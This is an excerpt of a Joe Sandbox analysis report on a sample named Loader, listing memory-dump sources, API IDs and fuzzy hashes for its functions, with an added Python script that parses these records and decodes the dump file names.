                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
                                                                                        • Instruction ID: b0da67189007bcc97d6055f8bbbbefa6b2a6acbc0e85e8bb44e11b41e7f0aee1
                                                                                        • Opcode Fuzzy Hash: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
                                                                                        • Instruction Fuzzy Hash: 50C15DB29087418FC360CF68DC96BABB7E1BF85318F09492DD1DAD6342D778A155CB0A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 4e89514d7dac5dfbace0a3c2120b488323016d79f8a5a6a28643cbff8d0ca643
                                                                                        • Instruction ID: df5d66982e82d9da0c83d8871eb17dc63a9cae4063427cc854b8ed9741255339
                                                                                        • Opcode Fuzzy Hash: 4e89514d7dac5dfbace0a3c2120b488323016d79f8a5a6a28643cbff8d0ca643
                                                                                        • Instruction Fuzzy Hash: B191D035A042029BD714DF18D890A2BB3E2FFD9710F1A947DE8848B365DB35EC15CB86
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 511e5f5d07354a950006b57d08dd2b492a5e40f6cefdfcbce624f94dcd51246f
                                                                                        • Instruction ID: b19f5d29e2c271d05d9b02af8e112a34cc993ab04f81e0962c2f1fd7e648b238
                                                                                        • Opcode Fuzzy Hash: 511e5f5d07354a950006b57d08dd2b492a5e40f6cefdfcbce624f94dcd51246f
                                                                                        • Instruction Fuzzy Hash: 577126376442115BD7289B14C8D27BBB393EBC4308F2B943EC89597346C639DC42CB99
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4a7e2e401e033a0f057dbf8ff00cebb85c56be680a596657b403d1290487c1e4
                                                                                        • Instruction ID: 837a5f8fba9af2e76d8f4c8dd82aa53554112591729eea7ba58ef9321cfe3655
                                                                                        • Opcode Fuzzy Hash: 4a7e2e401e033a0f057dbf8ff00cebb85c56be680a596657b403d1290487c1e4
                                                                                        • Instruction Fuzzy Hash: CC612775A443418BD714CF28C8D12B7B7E1EFD6314F18591DE8D69B390E3399841CB99
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: bdc149f6aa6c65f2afe0ce58afa7e2e12997a48fd04755b1e3ff8753db4aaf0f
                                                                                        • Instruction ID: b35cb8c2cf53a133ed11b1d86afdaa14cbe7a2f38a3c964bfbd89494e95443a3
                                                                                        • Opcode Fuzzy Hash: bdc149f6aa6c65f2afe0ce58afa7e2e12997a48fd04755b1e3ff8753db4aaf0f
                                                                                        • Instruction Fuzzy Hash: 49513876A947208FC710DF28888066BF7A2EB99328F5A596ED9D4A7310D339DC11C7C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57cbe29f3acfbb96a0407096e691a252ccdd5f49df0adfd4ec822cf8a0979c5f
                                                                                        • Instruction ID: cecfcecca609f4f8aefbd91ebdf5ed5dce85e47701b726ac3bc9c92813edaa51
                                                                                        • Opcode Fuzzy Hash: 57cbe29f3acfbb96a0407096e691a252ccdd5f49df0adfd4ec822cf8a0979c5f
                                                                                        • Instruction Fuzzy Hash: A68118F5A083515FC718CF18C0916ABB7E2ABE5304F14892EE4DA87342D639DD8ACB56
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ce77249f7da53d6eb946ab68e7e4d6b580af9a2ed7836514d26728ed629edcae
                                                                                        • Instruction ID: f6c45a8c634b512175a9e70196cb5cb6fdc393861da751afe9f50228713363b5
                                                                                        • Opcode Fuzzy Hash: ce77249f7da53d6eb946ab68e7e4d6b580af9a2ed7836514d26728ed629edcae
                                                                                        • Instruction Fuzzy Hash: C75154B2219301ABD714DF24D881B3FB3E5EB88304F15582DF5C597281EB39E815CB9A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ea139d436da9a42b5af944e7643efc36d26f377cf16c3da6660ca1ea28a71a55
                                                                                        • Instruction ID: 71661ae89f4dd01ff183d23213b8ff6c182fb73d3ee196f738fd9547aa9552c9
                                                                                        • Opcode Fuzzy Hash: ea139d436da9a42b5af944e7643efc36d26f377cf16c3da6660ca1ea28a71a55
                                                                                        • Instruction Fuzzy Hash: C361E73A649A9047E329CA3E4C613EA6E930FD7230F2DC76AEDF5873E1C56948468345
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d83bca14b4ce495ba67310cee811436dda4ca7262d4045f186dce4ff59411968
                                                                                        • Instruction ID: 103638228cde8f0ddd279f3242b3a0c66f1c78d5dd6d37fd669a412139e610f8
                                                                                        • Opcode Fuzzy Hash: d83bca14b4ce495ba67310cee811436dda4ca7262d4045f186dce4ff59411968
                                                                                        • Instruction Fuzzy Hash: 09610677A2935087D339CF14C8A13EBB6D2BBCA314F1A463DC4DA57291CB395902CB86
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3ee60825706bd1979d5f6783ae8aacf4056d3ecd9403fe59bacac0383620a459
                                                                                        • Instruction ID: 59add0b6ac401b792bf6ca932ddb3aab880f712b326be28d571c8b7eb3c2cde8
                                                                                        • Opcode Fuzzy Hash: 3ee60825706bd1979d5f6783ae8aacf4056d3ecd9403fe59bacac0383620a459
                                                                                        • Instruction Fuzzy Hash: 96512836A5A9904BE3288A3D4D2136679834FEB330F3DD77AA5B1873F5C5BD88024359
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 09949bd114e3357849821c2342b6d8f9fdc9bcc2aff312f62db3595347d323c5
                                                                                        • Instruction ID: 3674ee1043ff53bbacdcda023bd703922f0cd6b64f6926a4024f69ceb265895f
                                                                                        • Opcode Fuzzy Hash: 09949bd114e3357849821c2342b6d8f9fdc9bcc2aff312f62db3595347d323c5
                                                                                        • Instruction Fuzzy Hash: 7461E039A08202CFE318CF69E89132AB3E2FFC9311F59857CE98587291D778D951CB44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b788d366b37990fd8b512b9f352556e76483e0de2e58c15ff86fdb87e33e91f9
                                                                                        • Instruction ID: b4bd1d43185d4267fc95ac4d79e73dc03833d4744d2df80aa086061bc0fab29c
                                                                                        • Opcode Fuzzy Hash: b788d366b37990fd8b512b9f352556e76483e0de2e58c15ff86fdb87e33e91f9
                                                                                        • Instruction Fuzzy Hash: 2B510636B159D04BC7149A7C4C413EAAA535BE733473D836BE8B4C73E5D62A8C4243D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cf0dfac4f95839a39133e74d75d87f013ce75ab19d687191ed322443166bf8d9
                                                                                        • Instruction ID: 1dbfe680f79b7bc42e4c2a034f6e37913707943d44f4a0eb3da3a59864a671cb
                                                                                        • Opcode Fuzzy Hash: cf0dfac4f95839a39133e74d75d87f013ce75ab19d687191ed322443166bf8d9
                                                                                        • Instruction Fuzzy Hash: 43514C3B6499D14BE7288A3D5C113E66A834BE3334F3DC77BD9B1873E1D96948824349
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9bdbf699b7803bb421f447e227b31dbd0a4a1b53ba0c1baea900085ed5ea74d5
                                                                                        • Instruction ID: c8d49a6ff177a597ceac419c0c9b69cbf9ac8c960e381b5f21487d05f4e0f372
                                                                                        • Opcode Fuzzy Hash: 9bdbf699b7803bb421f447e227b31dbd0a4a1b53ba0c1baea900085ed5ea74d5
                                                                                        • Instruction Fuzzy Hash: 7C515DB15087548FE314DF29D49475BBBE1BBC8318F044A2EE5E987391E379DA088F86
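
The records above are Joe Sandbox's per-function similarity entries, each tied to a memory dump whose file name is a run of dot-separated fields. The Python below is an added example and is not Joe Sandbox's code or anything from this report: it parses such records as they copy out of the page (including the "Download File" link text that the extraction fused onto the Associated lines), strips that residue, and decodes the .sdmp file names. The field layout it assumes for those names (process index, dump phase, dump id, base address, page protection, allocation state, memory type, reserved) is inferred from the listing, where the PE header at 0x400000 carries 00000002, the code at 0x401000 carries 00000020 and the writable data at 0x443000 carries 00000004, matching the Win32 values PAGE_READONLY, PAGE_EXECUTE_READ and PAGE_READWRITE; that layout is an assumption, not something the page documents. The sample input is two records copied from this section.

```python
"""Parse Joe Sandbox function-similarity records and decode .sdmp dump names.
Added example, not Joe Sandbox code."""
import re
from collections import Counter

# Constructed input: two records copied from the listing above, including the
# "Download File" link text the page extraction fused onto the Associated lines.
SAMPLE = """\
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 4e89514d7dac5dfbace0a3c2120b488323016d79f8a5a6a28643cbff8d0ca643
• Instruction ID: df5d66982e82d9da0c83d8871eb17dc63a9cae4063427cc854b8ed9741255339
• Opcode Fuzzy Hash: 4e89514d7dac5dfbace0a3c2120b488323016d79f8a5a6a28643cbff8d0ca643
• Instruction Fuzzy Hash: B191D035A042029BD714DF18D890A2BB3E2FFD9710F1A947DE8848B365DB35EC15CB86
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4a7e2e401e033a0f057dbf8ff00cebb85c56be680a596657b403d1290487c1e4
• Instruction ID: 837a5f8fba9af2e76d8f4c8dd82aa53554112591729eea7ba58ef9321cfe3655
• Opcode Fuzzy Hash: 4a7e2e401e033a0f057dbf8ff00cebb85c56be680a596657b403d1290487c1e4
• Instruction Fuzzy Hash: CC612775A443418BD714CF28C8D12B7B7E1EFD6314F18591DE8D69B390E3399841CB99
"""

# Standard Win32 constants from winnt.h (only the values that matter here).
PAGE_PROTECTION = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                   0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMED layout of an .sdmp name (inferred from the listing, not documented on the
# page): process.phase.dumpid.base.protection.state.type.reserved.sdmp
DUMP_NAME = re.compile(r"^(\d+)\.(\d+)\.(\d+)\.([0-9a-fA-F]{16})\.([0-9a-fA-F]{8})"
                       r"\.([0-9a-fA-F]{8})\.([0-9a-fA-F]{8})\.([0-9a-fA-F]{8})\.sdmp$")
FIELD_LINE = re.compile(r"^•\s*([^:]+):\s*(.*?)\s*$")   # "• Key: value" lines


def decode_protection(value):
    """Render a PAGE_* value, e.g. 0x20 -> PAGE_EXECUTE_READ (modifier bits appended)."""
    names = [PAGE_PROTECTION.get(value & 0xFF, f"0x{value & 0xFF:x}")]
    names += [n for bit, n in PAGE_MODIFIERS.items() if value & bit]
    return "|".join(names)


def decode_dump_name(name):
    """Split an .sdmp file name into labelled fields (see the layout assumption above)."""
    m = DUMP_NAME.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    proc, phase, dump_id, base, prot, state, mtype, _reserved = m.groups()
    return {"process": int(proc), "phase": int(phase), "dump_id": int(dump_id),
            "base": int(base, 16), "protection": decode_protection(int(prot, 16)),
            "state": MEM_STATE.get(int(state, 16), f"0x{int(state, 16):x}"),
            "type": MEM_TYPE.get(int(mtype, 16), f"0x{int(mtype, 16):x}")}


def parse_records(text):
    """Turn the copy-pasted listing into one dict per 'Memory Dump Source' block."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":          # a new function record starts here
            cur = {"associated": [], "fields": {}}
            records.append(cur)
            continue
        m = FIELD_LINE.match(line) if cur is not None else None
        if not m:
            continue                              # "Similarity", plugin label, blanks
        key, value = m.group(1), re.sub(r"Download File$", "", m.group(2)).strip()
        if key == "Source File":                  # "<dump>, Offset: <hex>, based on PE: ..."
            name, _, rest = value.partition(",")
            cur["source_file"] = name.strip()
            off = re.search(r"Offset:\s*([0-9a-fA-F]+)", rest)
            cur["offset"] = int(off.group(1), 16) if off else None
        elif key == "Associated":
            cur["associated"].append(value)       # link residue already stripped
        else:
            cur["fields"][key] = value            # API ID, Opcode ID, fuzzy hashes, ...
    return records


def api_summary(records):
    """Count functions per resolved API ID; the '' key is functions with no API attributed."""
    return Counter(r["fields"].get("API ID", "") for r in records)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        src = decode_dump_name(r["source_file"])
        print(f"{r['fields'].get('API ID') or '-':16} ifh={r['fields']['Instruction Fuzzy Hash'][:12]}.. "
              f"base=0x{src['base']:x} {src['protection']} {src['state']} {src['type']}")
    print(dict(api_summary(recs)))
```

Pasting a whole report section into a file and feeding it to parse_records gives one record per function; api_summary then separates the functions that resolved to an API such as InitializeThunk from the ones with no API attribution, which are the entries whose Instruction Fuzzy Hash is worth comparing against other samples of the same family.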
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2386d36897bf1386ab56ddc4731fef31f44eacf2d7d568e4c2cd08539e9d711f
                                                                                        • Instruction ID: ff43df00b5e389bdd38790fefcb310c293d1fdf7247e1519200242e4ee5865d4
                                                                                        • Opcode Fuzzy Hash: 2386d36897bf1386ab56ddc4731fef31f44eacf2d7d568e4c2cd08539e9d711f
                                                                                        • Instruction Fuzzy Hash: C351F5B1A113009FDB189F78D88276B7FB1EB46310F29466DE8616F3D6CA758802CBD5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4749d5454b3eb74c411d3dc428575baddac023c248d34a0cb5d0ed3e0167ae40
                                                                                        • Instruction ID: ec60d79e9d99398f5bf721a678dee3528edc53b358c1986174b370103f8ae50c
                                                                                        • Opcode Fuzzy Hash: 4749d5454b3eb74c411d3dc428575baddac023c248d34a0cb5d0ed3e0167ae40
                                                                                        • Instruction Fuzzy Hash: 8C4127717583408BC718CF24C8A16BB77E2EFC2314F09966EE4929B395E77899018746
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b266102848aaec52d287cf8d82cce6b7315ab8a25edd9d901008a35f8068e397
                                                                                        • Instruction ID: 75ae33ee84d3c7d119d422aec1f6d53cacd92bd262506f0dc3cba3e240e4169c
                                                                                        • Opcode Fuzzy Hash: b266102848aaec52d287cf8d82cce6b7315ab8a25edd9d901008a35f8068e397
                                                                                        • Instruction Fuzzy Hash: A85129B2A15B254BC719CE2CD85123EB6D2ABC8200F89863DD9578B385EF74AC11D781
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 366e3924c574ddacca9bd2508606259013c409bc3d6e59caa2bc62a8e73a42ff
                                                                                        • Instruction ID: 3217a7f3b2c1ac2314ea892c952e4e56d7b88ae452a0d31b4d6c2ba9e1cd6989
                                                                                        • Opcode Fuzzy Hash: 366e3924c574ddacca9bd2508606259013c409bc3d6e59caa2bc62a8e73a42ff
                                                                                        • Instruction Fuzzy Hash: 8051E076A08311CBD7248F25D85261BB3F2FF85314F09896DE5858B391EB789805CB9A
                                                                                        Memory Dump Source
